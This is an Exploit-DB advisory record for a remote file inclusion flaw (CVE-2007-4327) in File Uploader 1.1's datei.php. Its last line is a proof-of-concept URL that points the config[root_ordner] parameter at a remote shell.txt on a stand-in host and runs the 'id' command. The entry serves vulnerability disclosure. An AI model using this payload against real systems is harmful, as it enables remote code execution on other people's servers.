File Uploader 1.1 - datei.php configroot_ordner Parameter Remote File Inclusion

2007-08-09T00:00:00
ID EDB-ID:30467
Type exploitdb
Reporter Rizgar
Modified 2007-08-09T00:00:00

Description

File Uploader 1.1 datei.php config[root_ordner] Parameter Remote File Inclusion. CVE-2007-4327. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/25253/info
 
File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
File Uploader 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/datei.php?config[root_ordner]=http://www.example2.com/shell.txt?&cmd=id